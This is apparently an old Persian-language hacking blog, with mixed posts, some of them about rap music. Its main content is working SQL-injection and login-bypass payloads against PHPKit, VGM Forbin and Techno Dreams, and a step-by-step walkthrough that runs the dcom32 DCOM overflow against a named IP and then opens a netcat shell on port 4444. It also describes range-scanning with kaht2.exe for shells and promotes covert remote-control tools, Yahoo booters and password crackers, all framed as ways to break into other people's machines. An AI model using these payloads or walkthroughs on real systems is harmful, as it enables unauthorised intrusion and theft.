SQL Injection and PHP Code Injection Vulnerabilities in PHPKit 1.6.1
SQL Injection in include.php?path=login/member.php
The parameters usernick and letters are vulnerable to SQL Injections.
POC:
/phpkit/include.php?path=login/member.php&letter=phuket'%20AND%20MID(use
r_pw,1,1)='8'/*
This will show the user "phuket" if the first character of his password
hash is '8'.
SQL Injection in include.php?path=login/imcenter.php
منبع : securityfocus.com
+ نوشته شده در چهارشنبه بیست و دوم شهریور 1385ساعت 0:57 توسط
|
Happy New Years
وبلاگ جون تولدت مبارک
+ نوشته شده در دوشنبه نوزدهم تیر 1385ساعت 15:55 توسط
|
SQL injection in VGM Forbin
#######################################
# Www.H4ckerz.coM --- Www.Hackerz.iR #
#######################################
**************************************************
Vendor : VGM Forbin
Target Page : resource/products/adm/login.asp
Action : Turn back too default.asp
Exploit :
Username : admin'-'
Password : 'x' or '1'--
###############################################
H4ckerZ Researching Team
Greetz : Hessam-X , Ro0X , and other iranian hackerZ ;-)
!!!!!!!!!!!!!!!!!!!!!!!!
DevilZ Z0ne Member
!!!!!!!!!!!!!!!!!!!!!!!!
Received on Mar 27 2006
+ نوشته شده در یکشنبه بیست و هشتم خرداد 1385ساعت 11:16 توسط
|
بعد اولین قسمت ژورنال سریز بافر
با کاملتر کردن قسمت اول به مباحث جدیدتری هم پرادختم تا یک ژورنال در سطح پیشرفته و کاری قابل قبول باشه!
مباحث:
پیشه چیست؟
انواع پشته؟
پشته از دید ماهیت و Sp ؟
بافر چیست؟
ساختار بافر؟
هیپ چیست؟
سریز بافر!
چگونگی سریز و کدهای مخرب
زیر ریز بافر چیست؟
چگونگی این خطا در بافر؟
کدها و سورس ها برای زیر ریز؟
و نمونه برنامه ها برای خطا های بافر
چگونگی شل کد نوشتن و .....
از مقاله PDF بوده و با Acrobat Reader باز میشود
نویسنده: Satanic Soulful
Download
منبع : شیطان جهنمی
+ نوشته شده در سه شنبه دوازدهم اردیبهشت 1385ساعت 20:40 توسط
|
TroMessenger
با اين برنامه مي توانيد كامپيوتر ديگري را از طريق ياهو مسنجر كنترل كنيد.
بدين صورت كه: اين برنامه يك آي دي روبات ياهو به طور مخفيانه در كامپيوتر طرف آنلاين مي كند كه شما با PM دادن به آن، مي توانيد دستورات مورد نظر خود را اجرا كنيد. مثلا:
/cmd dir *.txt
/cmd ipconfig /all
/date /time
/ip /osname /winusername
كه براي گرفتن اطلاعات مختلف از كامپيوتر هدف به كار مي روند.
ضمنا به دليل استقبال كشورهاي خارجي از اين برنامه و همچنين برقراري رابطه دوستي با اين كشورها، از جمله روماني، پاكستان و كشورهاي عربي، تصميم گرفتيم راهنماي اين برنامه را به اين چند زبان نيز عرضه كنيم. البته راهنماي هندي و تركي آن نيز به زودي آماده مي شود.
براي دانلود اين برنامه و ديدن توضيحات آن، از لينك زير استفاده كنيد:
http://www.sma-soft.ir/TroMessenger/
ضمنا نسخه جدید ترومسنجر هم آماده دانلود می باشد. که از آدرس زیر می توانید دانلود کنید:
http://www.sma-soft.ir/downloads/?u=TroMessenger
Sma-Soft:منبع
+ نوشته شده در شنبه نهم اردیبهشت 1385ساعت 21:52 توسط
|
این برنامه واسه محدود کردن سیستم های کافی به کار میره
Download
+ نوشته شده در پنجشنبه هفتم اردیبهشت 1385ساعت 14:35 توسط
|
+ نوشته شده در جمعه یازدهم فروردین 1385ساعت 1:14 توسط
|
+ نوشته شده در پنجشنبه ششم بهمن 1384ساعت 1:40 توسط
|
برنامه ای برای هک کردن سایت های هاستینگ کنترولر
این برنامه رو خودم نوشتم ! و میتونید از لینک زیر دانلود کنید
البته باید بگم که قول نمیدم دیگه سایت های زیادی HC زیادی برای هک کردن باشه .
ولی خوب ...
Download
+ نوشته شده در چهارشنبه پنجم بهمن 1384ساعت 18:40 توسط
|
سورس برنامه ی Buddy Spy
خوب شاید برخی از شما نام نرم افزار Buddy Spy رو شنیده باشید , اگر هم نشنیده اید خوب من براتون می گم . کاربرد این برنامه برای Yahoo Messanger هست , مثلا شما می خواهید دیگران فکر کنند که شما WebCam دارید یا اینکه بفهمید یک شخص خاصی واقعاً invisible هست یا نه و اینکه شخص مورد نظر شما در Room های یاهو هست یانه و ..... . خوب این برنامه با ویژوال بیسیک نوشته شده و آقای Brandon Henricks لطف کردن و سورس این برنامه را بصورت Free و تحت GNU Licence عرضه کرده اند .
دریافت Source برنامه
+ نوشته شده در پنجشنبه بیست و نهم دی 1384ساعت 20:14 توسط
|
فيلم آموزش کامپايل کردن اکسپلويت به زبان پرل
لینک فیلم: http://www.satanic.persiangig.com/video/perl.rar
570 کیلوبایت هست
برنامه های مورد نیاز:
اکتیو پرل Active Perl
با توجه به پلت فورم که دارید اکتیو پرل رو دانلود کنید(اگر لینوکس هستید لینوکس اگر ویندوز هستید ویندوز)
از سایت زیر میتونید دانلود کنید(اول سیستم عامل تون رو مشخص کنید بد اکتیو پرل رو دانلود کنید) : http://downloads.activestate.com/ActivePerl/
من از این نسخه استفاده میکنم : ActivePerl-5.6.1.638-MSWin32-x86
-------------------------------------------------------------------------------
در صورت دانلود نشدن از سايت زير دانلود کنيد: Simorgh-ev.com/clip
منبع : گروه هکینگ و امنیتی جهنم شیطانی
+ نوشته شده در سه شنبه بیست و هفتم دی 1384ساعت 22:25 توسط
|
آخرين ويرايش ابزار شنود و حمله Cain & Abel - 2.8.1
يك برنامه بسيار قوي و جالب در زمينه Recovery كردن پسوردها است كه براي سيستم عامل هاي ويندوز نوشته شده است. اين ابزار براحتي اجازه Recovery كردن انواع مختلف پسوردها را به وسيله Sniff كردن شبكه, Crack كردن پسوردهاي رمزنگاري شده با استفاده از روش Dictionary Attack و Brute-Force و همينطور Decode كردن پسوردهاي Hash شده و MD5 و scramble را براي شما انجام مي دهد. از امكانات ديگر اين برنامه كشف و پيدا كردن پسوردهاي Cache و آناليز كردن پروتكل هاي Router ها و مسيريابي آنها مي باشد. اين نكته را ذكر كنيم كه اكثر هكرها براي Crack كردن پسوردهاي MD5 مثل پسوردهاي User هاي فروم هايي مثل PHPBB از اين برنامه استفاده مي كنند. اين برنامه كاري از تيم Massimiliano Montoro مي باشد.
Download Cain 2.8.1
منبع : گروه هکینگ و امنیتی جهنم شیطانی
+ نوشته شده در سه شنبه بیست و هفتم دی 1384ساعت 22:20 توسط
|
Persian Rapper
خوب بچه ها آهنگ رپ من به نام *شاخ شکون* کامل شده و آماده دانلود میباشد!
آهنگو در سایت دوستم آپلود کردم و سرعتش خوبه
میتونید آهنگو دانلود کنید ! 
Download Music Rap Satanic
+ نوشته شده در جمعه یازدهم آذر 1384ساعت 13:40 توسط
|
+ نوشته شده در شنبه پنجم آذر 1384ساعت 18:35 توسط
|
Advanced Guestbook 2.2 SQL Injection Exploit
کد:
و در قسمت پسورد هم هیچی ننویسید
موفق باشید
+ نوشته شده در پنجشنبه بیست و ششم آبان 1384ساعت 17:10 توسط
|
Techno Dreams Scripts SQL injection
SQL injection
-------
حفره ي جديد در برنامه Techno Dreams توسط كانون پژوهشگران دانش امنيت (تيم امنيتي پرشين هكرز سابق) كشف شد.
تاریخ کشف:
31 مهر 1384
درباره برنامه:
Techno Dreams مجموعه برنامه هايي روي وب است كه شامل Announcement - Guestbook - Mailing List - WebDirectory مي باشد.
برای کسب اطلاعات بیشتر به سایت: Techno Dreams مراجعه کنید.
شرح :
----------------
آسيب پذيري موجود در اين مجموعه برنامه ها به نفوذ گر اين اجازه را مي دهد كه كدها خطرناكي را روي بانك اطلاعاتي اجرا كند در نتيجه مي تواند به اطلاعات پر اهميت دسترسي پيدا كند.
آسیب پذیری :
--------------------
<html>
<h1>Techno Dreams Announcement - Guestbook - WebDirectory Script
Login-Bypass PoC - Kapda `s advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/admin/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
<html>
<h1>Techno Dreams Mailing List Script Login-Bypass PoC - Kapda `s
advisory </h1>
<p> Discovery and exploit by farhadkey [at} kapda.ir</p>
<p><a href="http://www.kapda.ir/"> Kapda - Security Science Researchers
Institute
of Iran</a></p>
<form method="POST" action="http://target/login.asp">
<input type="hidden" name="userid" value="'union all select '1','1'
from admin where ''='">
<input type="hidden" name="passwd" value="1">
<input type="submit" value="Submit" name="submit">
</form></html>
راهکار امنیتی :
--------------------
هيچ راهكار امنيتي درحال حاضر موجود نيست.
اطلاعات بیشتر :
--------------------
http://www.securityfocus.com/archive/1/414708/30/0/threaded
http://www.securityfocus.com/bid/15215
+ نوشته شده در پنجشنبه پنجم آبان 1384ساعت 10:1 توسط
|
آموزش نفوذ به كامپيوتر ديگران به وسيله ي Dcom32
شما ابتدا دو قابل زیر را دانلود کنید و در درایو C خود کپی کنید
Dcom32 NetCat حالا به Run رفته cmd رو تایپ کنید و بعد اینتر حالا به این صورت زیر عمل کنید >>>
C:\>dcom32
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin Lauziكre <blauziere [at] altern.org>
- Usage: dcom32 <Target ID> <Target IP>
- Targets:
- 0 Windows 2000 SP0 (english)
- 1 Windows 2000 SP1 (english)
- 2 Windows 2000 SP2 (english)
- 3 Windows 2000 SP3 (english)
- 4 Windows 2000 SP4 (english)
- 5 Windows XP SP0 (english)
- 6 Windows XP SP1 (english)
همونطور که میبینید این اکسپولیت تا سرویس پک 1 قابل اجراست .
حالا ما آی پی طرف مقابل رو داریم میخوایم با استفاده از این اکسپولیت از کامپیوترش شل بگیریم.
به صورت زیر عمل کنید>>>
C:\>dcom32 6 81.12.13.27
---------------------------------------------------------
- Remote DCOM RPC Buffer Overflow Exploit
- Original code by FlashSky and Benjurry
- Rewritten by HDM <hdm [at] metasploit.com>
- Ported to Win32 by Benjamin Lauziكre <blauziere [at] altern.org>
- Using return address of 0x77e626ba
Use Netcat to connect to 81.12.27.119:4444
اینی که با خط نارنجی مشخص کردم اینو میگه که پورت 4444 رو این آی پی باز شده و شما میتونید به وسیله نتکت از اون کامپیوتر شل بگیریم
برای شل به وسیله نتکت به این صورت عمل کنید >>>
C:\>nc\nc -vvv 81.12.27.119 4444
و اگر به کامپیوتر طرف وصل بشید خط فرمان زیر را برای شما باز میکنه :
C:\WINDOWS\system32>
+ نوشته شده در دوشنبه هجدهم مهر 1384ساعت 22:3 توسط
|
+ نوشته شده در شنبه پنجم شهریور 1384ساعت 10:28 توسط
|
Exploite
با کمک این exploit که از باگ dcom استفاده می کند می توانید روی یک رنج ip بدون انجام هیچ کاری وارد سیستم قربانی شوید .بدون داشتن هیچ اطلاعاتی از هک و ارتباط قبلی با قربانی .البته این باگ ازباگ های قدیمیه ولی هنوز کار می کنه و چون می خواستیم که شروعی باشه برای ارائه ی باگ های کامپایل شده ی جدید که بزودی تو سایت ارائه می شه . برای کار با این باگ بعد از داونلود در درایو c خودتون کپیش کنید و بعد به منوی استارت برید و در run رفته cmd را تایپ کنید .بعد از ورود به cmd و با داشتن ip خود به طور مثال ip من 217.218.190.55 هستش میرم تو command prompt مینویسم C:>kaht2.exe 217.218.190.1 217.218.190.254 که با این کار برنامه این رنج را برای پیدا کردن سیستم های نفوذ پذیر چک می کند و وارد آن ها می شود و خط فرمان آن ها را در اختیار شما قرار می دهد (از آن ها شل می گیرد
Download
+ نوشته شده در دوشنبه هفدهم مرداد 1384ساعت 11:34 توسط
|
مقاله ی بوت کردن در یاهو نوشته شد. و تعدادی بوتر که قبلا توسط خودم امتحان شده و کار هم میکنه واسه دانلود گذاشتم برای دیدن بقیه مطالب بوت در یاهو روی ادامه ی متن کلیک کنید
ادامه متن...
+ نوشته شده در دوشنبه دهم مرداد 1384ساعت 16:16 توسط
|
تازگيها پرشين رپ طرفدارای زيادی پيدا کرده ، خود من هم آهنگام تا ۲ یا ۳ هفته دیگه میاد رو نت لقبمم SATANIC هست 